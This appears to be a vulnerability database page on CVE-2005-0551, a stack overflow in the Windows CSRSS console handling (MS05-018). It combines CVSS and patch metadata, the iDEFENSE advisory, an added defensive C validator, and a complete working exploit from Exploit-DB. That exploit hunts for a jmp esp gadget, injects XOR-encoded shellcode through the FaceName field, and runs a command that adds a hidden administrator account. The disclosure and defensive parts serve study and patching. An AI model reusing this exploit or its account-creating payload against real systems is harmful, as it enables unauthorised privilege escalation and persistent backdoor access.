CVE-2005-0551
CVSS 10.0
Published: 2005-05-02 00:00:00
Revised: 2008-09-10 15:36:10

[Original] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value.


[CNNVD] Microsoft Windows CSRSS.EXE Stack Overflow Vulnerability (MS05-018) (CNNVD-200505-017)

The Windows kernel is the core of the operating system; it provides system-level services such as device and memory management, processor time allocation, and error handling.
The Win32 API uses console windows to implement command-line and other character-based user interfaces. The code implementing this feature lives in the CSRSS.EXE system process, whose WINSRV.DLL creates and manages console windows. When a user selects the "Properties" item from a console window's system menu, a data structure holding the console window's information is copied into a file-mapping object. This structure is called CONSOLE_STATE_INFO and is laid out as follows:
        typedef struct _CONSOLE_STATE_INFO
         {
         /* 0x00 */ DWORD cbSize;
         /* 0x04 */ COORD ScreenBufferSize;
         /* 0x08 */ COORD WindowSize;
         /* 0x0c */ POINT WindowPosition;
         /* 0x14 */ COORD FontSize;
         /* 0x18 */ DWORD FontFamily;
         /* 0x1c */ DWORD FontWeight;
         /* 0x20 */ WCHAR FaceName[32]; /* Buffer Overflow */
         /* 0x60 */ DWORD CursorSize;
         /* 0x64 */ BOOL FullScreen;
         /* 0x68 */ BOOL QuickEdit;
         /* 0x6c */ BOOL DefaultWindowPos;
         /* 0x70 */ BOOL InsertMode;
         /* 0x74 */ WORD ScreenColors;
         /* 0x76 */ WORD PopupColors;
         /* 0x78 */ BOOL HistoryNoDup;
         /* 0x7c */ DWORD HistoryBufferSize;
         /* 0x80 */ DWORD NumberOfHistoryBuffers;
         /* 0x84 */ COLORREF ColorTable[16];
         /* 0xc4 */ DWORD CodePage;
         /* 0xc8 */ DWORD hwnd;
         /* 0xcc */ WCHAR ConsoleTitle[2];
         } CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;
The values in this structure are passed to code in WINSRV.DLL, but that code does not validate the data correctly. An attacker who submits a CONSOLE_STATE_INFO consisting entirely of zeros can terminate the CSRSS process and crash the system (blue screen).
The CONSOLE_STATE_INFO structure also contains the string FaceName[32], which names a font. This string is copied into a fixed-size stack buffer by the wcscpy() function without any checking, as shown below:
         0x5FFB39DF push [ebp+lpFaceName]
         0x5FFB39E2 lea eax, [ebp-54h]
         0x5FFB39E5 push eax
         0x5FFB39E6 call j_wcscpy
By supplying a string longer than 32 bytes an attacker can trigger a stack overflow, take full control of the computer, and execute arbitrary code.
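As an added illustration (not code from this page, from CNNVD, or from Microsoft), the validator below shows the bounded handling the WINSRV.DLL consumer lacked: it re-declares the CONSOLE_STATE_INFO prefix with fixed-width types so it builds on any platform, checks cbSize against the mapping, rejects the all-zero record, and copies FaceName only after proving a NUL inside its 32 WCHARs. The geometry checks and the helper check_record() are assumptions for this example, not Microsoft's fix.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Windows types re-declared with fixed widths so this builds anywhere. */
typedef uint32_t DWORD;
typedef uint16_t WCHAR;
typedef struct { int16_t X, Y; } COORD;
typedef struct { int32_t x, y; } POINT;
#define FACENAME_LEN 32   /* WCHAR FaceName[32] at offset 0x20 */

/* Prefix of CONSOLE_STATE_INFO as listed above; the fields after FaceName
 * (CursorSize ... ConsoleTitle) are not needed for these checks. */
typedef struct _CONSOLE_STATE_INFO {
    DWORD cbSize;                  /* 0x00 */
    COORD ScreenBufferSize;        /* 0x04 */
    COORD WindowSize;              /* 0x08 */
    POINT WindowPosition;          /* 0x0c */
    COORD FontSize;                /* 0x14 */
    DWORD FontFamily;              /* 0x18 */
    DWORD FontWeight;              /* 0x1c */
    WCHAR FaceName[FACENAME_LEN];  /* 0x20 */
} CONSOLE_STATE_INFO;
enum { CSI_OK = 0, CSI_BAD_SIZE, CSI_BAD_GEOMETRY, CSI_BAD_FACENAME };

/* The flawed pattern in the assembly above is in effect wcscpy(buf, FaceName),
 * which copies until the first NUL, so a FaceName with no NUL inside its
 * 32 WCHARs runs past the fixed stack buffer. This hardened consumer trusts
 * nothing in the shared mapping until it has been checked. */
int validate_console_state(const CONSOLE_STATE_INFO *csi, size_t mapping_len,
                           WCHAR out[FACENAME_LEN])
{
    size_t n = 0;
    /* 1. The mapping and cbSize must both cover the fields we read. */
    if (mapping_len < sizeof(*csi) || csi->cbSize < sizeof(*csi) ||
        csi->cbSize > mapping_len)
        return CSI_BAD_SIZE;
    /* 2. An all-zero record crashed CSRSS with a divide by zero. The page does
     *    not say which field was the divisor, so these checks are an assumption. */
    if (csi->ScreenBufferSize.X <= 0 || csi->ScreenBufferSize.Y <= 0 ||
        csi->WindowSize.X <= 0 || csi->WindowSize.Y <= 0 || csi->FontSize.Y <= 0)
        return CSI_BAD_GEOMETRY;
    /* 3. FaceName must contain a NUL within its 32 WCHARs; never scan past it. */
    while (n < FACENAME_LEN && csi->FaceName[n] != 0)
        n++;
    if (n == FACENAME_LEN)
        return CSI_BAD_FACENAME;
    memcpy(out, csi->FaceName, (n + 1) * sizeof(WCHAR)); /* n + 1 <= 32 proven */
    return CSI_OK;
}

/* Driver over a constructed record: name NULL leaves it all zeros (cbSize set
 * only when set_cbsize); otherwise sane geometry plus an ASCII font name, and
 * a name of 32 or more characters leaves FaceName with no terminator. */
int check_record(const char *name, int set_cbsize, size_t mapping_len)
{
    CONSOLE_STATE_INFO csi;
    WCHAR out[FACENAME_LEN];
    size_t i, len = name ? strlen(name) : 0;
    memset(&csi, 0, sizeof(csi));
    if (set_cbsize)
        csi.cbSize = sizeof(csi);
    if (name) {
        csi.ScreenBufferSize.X = 80; csi.ScreenBufferSize.Y = 300;
        csi.WindowSize.X = 80;       csi.WindowSize.Y = 25;  csi.FontSize.Y = 12;
        for (i = 0; i < FACENAME_LEN; i++)
            csi.FaceName[i] = (i < len) ? (WCHAR)name[i] : 0;
    }
    return validate_console_state(&csi, mapping_len, out);
}
```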

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system shutdown]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000  Microsoft Windows 2000
cpe:/o:microsoft:windows_xp::sp2:tablet_pc  Microsoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_xp::sp1:tablet_pc  Microsoft windows xp_sp1 tablet_pc

- OVAL (technical details for detection)

oval:org.mitre.oval:def:777  Windows 2000 CSRSS Privilege Escalation Vulnerability
oval:org.mitre.oval:def:3544  Windows XP CSRSS Privilege Escalation Vulnerability
oval:org.mitre.oval:def:266  Windows XP (SP2) CSRSS Privilege Escalation Vulnerability
oval:org.mitre.oval:def:1822  Server 2003 CSRSS Privilege Escalation Vulnerability
oval:gov.nist.fdcc.patch:def:7  MS05-018: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)
oval:gov.nist.USGCB.patch:def:7  MS05-018: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)
*OVAL describes the method for detecting this vulnerability in detail; see the related OVAL definitions for more technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0551
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0551
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-017
(official data source) CNNVD

- Other links and resources

http://www.microsoft.com/technet/security/bulletin/ms05-018.mspx
(VENDOR_ADVISORY)  MS  MS05-018
http://www.idefense.com/application/poi/display?id=230&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050412 Microsoft Windows CSRSS.EXE Stack Overflow Vulnerability

- Vulnerability information

Microsoft Windows CSRSS.EXE Stack Overflow Vulnerability (MS05-018)
Critical  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

No data available

- Vulnerability information (1198)

MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018) (EDBID:1198)
windows local
2005-09-06 Verified
0 eyas
N/A
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

#pragma comment (lib,"Advapi32.lib")

typedef struct _CONSOLE_STATE_INFO    {      
	  /* 0x00 */  DWORD cbSize;
      /* 0x04 */  COORD ScreenBufferSize;
      /* 0x08 */  COORD WindowSize;
      /* 0x0c */  POINT WindowPosition;
      /* 0x14 */  COORD FontSize;
      /* 0x18 */  DWORD FontFamily;
      /* 0x1c */  DWORD FontWeight;
      /* 0x20 */  WCHAR FaceName[0x200];
} CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;

typedef struct xxx
{
	DWORD	dw[6];
	char	cmd[0x50];
}address_and_cmd;

char decoder[]=
"\x8b\xdc"
"\xBE\x44\x59\x41\x53\x46\xBF\x44\x59\x34\x53\x47\x43\x39\x33\x75"
"\xFB\x83\xC3\x04\x80\x33\x97\x43\x39\x3B\x75\xF8\x45\x59\x41\x53";
//user=e
//pass=asd#321
char add_user[]=
"\x90\x90\x90\x90\x90\x90\x90\x8D\x7b\x98\xFF\x77\x14\x6A\x00\x68"
"\x2A\x04\x00\x00\xFF\x17\x8B\xD8\x6A\x04\x68\x00\x10\x00\x00\x68"
"\x00\x01\x00\x00\x6A\x00\x53\xFF\x57\x04\x8B\xF0\x6A\x00\x68\x00"
"\x01\x00\x00\x8D\x47\x18\x50\x56\x53\xFF\x57\x08\x33\xC0\x50\x50"
"\x56\xFF\x77\x10\x50\x50\x53\xFF\x57\x0C";
char decode_end_sign[]="EY4S";
char sc[0x200];

char	szConsoleTitle[256];

DWORD search_jmpesp()
{
	char szDLL[][30] = {"ntdll.dll",
						"kernel32.dll",
						"user32.dll",
						"gdi32.dll",						
						"winsrv.dll",
						"csrsrv.dll",
						"basesrv.dll"};
	int		i,y;
	BOOL	done;
	HMODULE	h;
	BYTE	*ptr;
	DWORD	addr=0;

	for(i=0;i<sizeof(szDLL)/sizeof(szDLL[0]);i++)
	{
		done = FALSE;
		h = LoadLibrary(szDLL[i]);
		if(h == NULL) 
			continue;
		printf("[+] start search \"FF E4\" in %s\n", szDLL[i]);
		ptr = (BYTE *)h;
		for(y = 0;!done;y++) 
		{ 
			__try 
			{ 
				if(ptr[y] == (BYTE)'\xFF' && ptr[y+1] == (BYTE)'\xE4') 
				{ 
					addr = (int)ptr + y; 
					done = TRUE;
					printf("[+] found \"FF E4\"(jmp esp) in %X[%s]\n", addr, szDLL[i]);
				} 
			} 
			__except(EXCEPTION_EXECUTE_HANDLER)
			{
				done = TRUE; 
			} 
		} 
		FreeLibrary(h);
		if(addr) break;
	}
	return addr;
}
BOOL make_shellcode(DWORD dwTargetPid)
{
	HMODULE	hKernel32;
	address_and_cmd	aac;
	int		i=0, j=0, size=0;

	hKernel32 = LoadLibrary("kernel32.dll");
	if(!hKernel32) return FALSE;
	aac.dw[0] = (DWORD)GetProcAddress(hKernel32, "OpenProcess");
	aac.dw[1] = (DWORD)GetProcAddress(hKernel32, "VirtualAllocEx");
	aac.dw[2] = (DWORD)GetProcAddress(hKernel32, "WriteProcessMemory");
	aac.dw[3] = (DWORD)GetProcAddress(hKernel32, "CreateRemoteThread");
	aac.dw[4] = (DWORD)GetProcAddress(hKernel32, "WinExec");
	aac.dw[5] = dwTargetPid;

	memset(aac.cmd, 0, sizeof(aac.cmd));
	strcpy(aac.cmd, "cmd /c net user e asd#321 /add && net localgroup administrators e /add");

	//encode
	strcpy(sc, decoder);
	for(i=0;i<sizeof(add_user);i++)
		add_user[i]^=(BYTE)'\x97';
	strcat(sc, add_user);
	for(i=0;i<sizeof(aac);i++)
		((char *)&aac)[i]^=(BYTE)'\x97';
	size=strlen(sc);
	memcpy(&sc[size], (char *)&aac, sizeof(aac));
	size+=sizeof(aac);
	sc[size]='\x0';
	strcat(sc, decode_end_sign);

	return TRUE;
}

void exploit(HWND hwnd,	DWORD dwPid)
{
	HANDLE				hFile;
	LPVOID				lp;
	int					i, index;
	DWORD				dwJMP;
	CONSOLE_STATE_INFO	csi;


	memset((void *)&csi, 0, sizeof(csi));
	csi.cbSize = sizeof(csi);
	csi.ScreenBufferSize.X = 0x0050;
	csi.ScreenBufferSize.Y = 0x012c;
	csi.WindowSize.X = 0x0050;
	csi.WindowSize.Y=0x0019;
	csi.WindowPosition.x = 0x58;
	csi.WindowPosition.y = 0x58;
	csi.FontSize.X = 0;
	csi.FontSize.Y=0xc;
	csi.FontFamily = 0x36;
	csi.FontWeight = 0x190;
	
	for(i=0;i<0x58;i++)
		((char *)csi.FaceName)[i] = '\x90';
	dwJMP = search_jmpesp();
	if(!dwJMP)
	{
		printf("[-] search FF E4 failed.\n");
		return;
	}
	memcpy(&((char *)csi.FaceName)[0x58], (char *)&dwJMP, 4);
	for(i=0;i<0x20;i++)
		strcat((char *)csi.FaceName, "\x90");
	index = strlen((char *)csi.FaceName);

	if(!make_shellcode(dwPid)) return;
	memcpy(&((char *)csi.FaceName)[index], (char *)sc, strlen(sc));

	hFile = CreateFileMappingW((void *)0xFFFFFFFF,0,4,0,csi.cbSize,0);
	if(!hFile)
	{
		printf("[-] CreateFileMapping failed:%d\n", GetLastError());
		return;
	}
	printf("[+] CreateFileMapping OK!\n");
	lp = MapViewOfFile(hFile, 0x0F001F,0,0,0);
	if(!lp)
	{
		printf("[-] MapViewOfFile failed:%d\n", GetLastError());
		return;
	}
	printf("[+] MapViewOfFile OK!\n");
	//copy
	memcpy((unsigned short *)lp, (unsigned short *)&csi, csi.cbSize);

	printf("[+] Send Exploit!\n");
	SendMessageW(hwnd,0x4C9,(WPARAM)hFile,0);
}

void main(int argc, char **argv)
{
	DWORD	dwRet;
	HWND	hwnd = NULL;
	DWORD	dwPid = 0;
	HANDLE hSnapshot = NULL;
	PROCESSENTRY32		pe;

	printf( "MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0\n"
			"Affect: Windows 2000 sp3/sp4 (all language)\n"
			"Coded by eyas <eyas at xfocus.org>\n"
			"http://www.xfocus.net\n\n");
	
	if(argc==2)
	{
		dwPid = atoi(argv[1]);
	}
	else
	{
		printf("Usage: %s pid\n\n", argv[0]);
		hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
		pe.dwSize = sizeof(PROCESSENTRY32);
		Process32First(hSnapshot,&pe);
		do
		{		
			if( strcmpi(pe.szExeFile, "WINLOGON.EXE") == 0)
			{
				printf("[+] PID=%d Process=%s\n", pe.th32ProcessID, pe.szExeFile);
			}
		}
		while(Process32Next(hSnapshot,&pe)==TRUE);
		CloseHandle (hSnapshot);
	}

	if(!dwPid)	return;

	if(!FreeConsole())
		printf("[-] FreeConsole failed:%d\n", GetLastError());
	else
	{
		printf("[+] FreeConsole ok.\n");
		if(!AllocConsole())
			printf("[-] AllocConsole failed:%d\n", GetLastError());
		else
			printf("[+] AllocConsole ok.\n");
	}

	dwRet = GetConsoleTitle(szConsoleTitle, sizeof(szConsoleTitle));
	if(dwRet)
	{
		printf("[+] Get Console Title OK:\"%s\"\n", szConsoleTitle);
	}
	else
	{
		printf("[-] Get Console Title failed.\n");
		return;
	}

	hwnd = FindWindow("ConsoleWindowClass",szConsoleTitle); 
	if(hwnd)
		printf("[+] bingo! found hwnd=%X\n", hwnd);
	else
	{
		printf("[-] can't found hwnd!\n");
		return;
	}

	exploit(hwnd, dwPid);
	printf("[+] Done.\n");
}

// milw0rm.com [2005-09-06]
		

- Vulnerability information (F37187)

04.12.05b.txt (PacketStormID:F37187)
2005-04-18 00:00:00
 
advisory,overflow,local
windows
CVE-2005-0551

iDEFENSE Security Advisory 04.12.05 (b) - CSRSS.EXE (the core executable for the Windows Client/Server Runtime Server Subsystem, the process which manages most graphical commands in Windows) is vulnerable to a local stack-based buffer overflow.

Microsoft Windows CSRSS.EXE Stack Overflow Vulnerability

iDEFENSE Security Advisory 04.12.05
www.idefense.com/application/poi/display?id=230&type=vulnerabilities
April 12, 2005

I. BACKGROUND

The Win32 application-programming interface (API) offers a console
windows feature that provides a means to implement command-line and 
other character-based user interfaces. The specific code for this
feature within the Windows 2000, XP and 2003 operating systems resides
in a core system process called CSRSS.EXE. This process is the main
executable for the Microsoft Client/Server Runtime Server Subsystem. The
process manages most graphical commands in Windows.

II. DESCRIPTION

Local exploitation of a stack-based buffer overflow vulnerability within
various versions of Microsoft Corp.'s Windows operating system allows
attackers to execute arbitrary code with SYSTEM privileges.

Console windows are created and managed by code in the WINSRV.DLL file
that resides in the CSRSS.EXE process. This file contains the
server-side version of the 32-bit user and GDI routines (graphics
engine). When a user selects the "Properties" item from the system menu
of a console window, a data structure containing information about the
console window is copied into the file-mapping object. The text of an
assert in the checked build appears to indicate that this structure is
called CONSOLE_STATE_INFO, which has the following structure:

    typedef struct _CONSOLE_STATE_INFO
    {
      /* 0x00 */  DWORD cbSize;
      /* 0x04 */  COORD ScreenBufferSize;
      /* 0x08 */  COORD WindowSize;
      /* 0x0c */  POINT WindowPosition;
      /* 0x14 */  COORD FontSize;
      /* 0x18 */  DWORD FontFamily;
      /* 0x1c */  DWORD FontWeight;
      /* 0x20 */  WCHAR FaceName[32];     /* Buffer Overflow */
      /* 0x60 */  DWORD CursorSize;
      /* 0x64 */  BOOL  FullScreen;
      /* 0x68 */  BOOL  QuickEdit;
      /* 0x6c */  BOOL  DefaultWindowPos;
      /* 0x70 */  BOOL  InsertMode;
      /* 0x74 */  WORD  ScreenColors;
      /* 0x76 */  WORD  PopupColors;
      /* 0x78 */  BOOL  HistoryNoDup;
      /* 0x7c */  DWORD HistoryBufferSize;
      /* 0x80 */  DWORD NumberOfHistoryBuffers;
      /* 0x84 */  COLORREF ColorTable[16];
      /* 0xc4 */  DWORD CodePage;
      /* 0xc8 */  DWORD hwnd;
      /* 0xcc */  WCHAR ConsoleTitle[2];
    } CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;

The values contained within this struct are passed as a file-mapping
object to code within WINSRV.DLL that does not properly validate the
data. Passing a CONSOLE_STATE_INFO of all zeros can induce an integer
divide-by-zero exception in the CSRSS process that will cause the
process to terminate and the system to crash (blue screen) shortly
thereafter. The CONSOLE_STATE_INFO data structure contains a null
terminated string specifying the name of a font, FaceName[32]. This
string is copied into a fixed sized stack buffer without any sanity
checking via the wcscpy() function, as can be seen in the following
assembly excerpt from WINSRV.DLL on Windows 2000 Service Pack 4 Checked
Build:

    0x5FFB39DF push [ebp+lpFaceName]
    0x5FFB39E2 lea eax, [ebp-54h]
    0x5FFB39E5 push eax
    0x5FFB39E6 call j_wcscpy

By supplying a string longer than 32 bytes, an attacker can trigger the
stack-based buffer overflow to gain control of the computer and
eventually execute arbitrary code.

III. ANALYSIS

Exploitation allows local unprivileged users to potentially execute
arbitrary code on affected systems with SYSTEM privileges. An attacker
with non-privileged access to a vulnerable system can leverage this
vulnerability to fully compromise the underlying system. Exploitation of
the described vulnerability requires that the attacker be able to create
a console window. This attack may be used on public terminals to break
imposed restrictions that otherwise prevent users from fully controlling
the computer.

IV. DETECTION

iDEFENSE has confirmed the existence and exploitability of this
vulnerability in Microsoft Windows 2000 SP4 and Microsoft Windows XP
SP1a containing the following versions of CSRSS.EXE and WINSRV.DLL:

    * Windows 2000 SP4 CSRSS.EXE  - 5.0.2195.6601
    * Windows 2000 SP4 WINSRV.DLL - 5.0.2195.6699
    * Windows XP SP1a  CSRSS.EXE  - 5.0.2195.6601
    * Windows XP SP1a  WINSRV.DLL - 5.0.2195.6699

iDEFENSE has confirmed the existence of this vulnerability as a local
denial of service (blue screen) on Windows XP SP2 and Windows 2003. It
is believed that code execution may also be possible on these platforms,
though more difficult, as both platforms employ buffer overflow
exploitation prevention methods.

V. WORKAROUND

Restrict console access on public terminals where security is a concern.
This can be accomplished by creating the following registry key:

    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System

Add a DWORD named DisableCMD with the value "1" to disable command
prompt and batch files or the value "2" to disable command prompt but
allow batch files.

VI. VENDOR RESPONSE

This vulnerability is addressed in Microsoft Security Bulletin MS05-018
available at:

http://www.microsoft.com/technet/security/Bulletin/MS05-018.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2005-0551 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

01/04/2005      Initial vendor notification
01/04/2005      Initial vendor response
04/12/2005      Coordinated public disclosure

IX. CREDIT

David Fritz is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.

There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

    

- Vulnerability information

15462
Microsoft Windows CSRSS Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in Windows. WINSRV.DLL fails to validate values within the CONSOLE_STATE_INFO struct resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-04-12 Unknown
2005-09-08 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft Windows Kernel CSRSS Local Privilege Escalation Vulnerability
Access Validation Error 13115
No Yes
2005-04-12 12:00:00 2008-12-10 11:32:00
David Fritz is credited with the discovery of this issue.

- Affected program versions

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Itanium 0
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98 SP1
Microsoft Windows 98 j
Microsoft Windows 98 b
Microsoft Windows 98 a
Microsoft Windows 98
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

- Unaffected program versions

Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

- Vulnerability discussion

A local privilege-escalation vulnerability affects Microsoft Windows because the kernel fails to properly handle user-supplied messages.

A local attacker may leverage this issue to completely compromise the computer.

- Exploit

Exploit code is available:

- Solution

Microsoft has released updates to address supported platforms.


Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Home SP2
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows XP Home SP1
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows 2000 Server SP3
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP Professional SP2
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows XP Professional SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- References

 

 
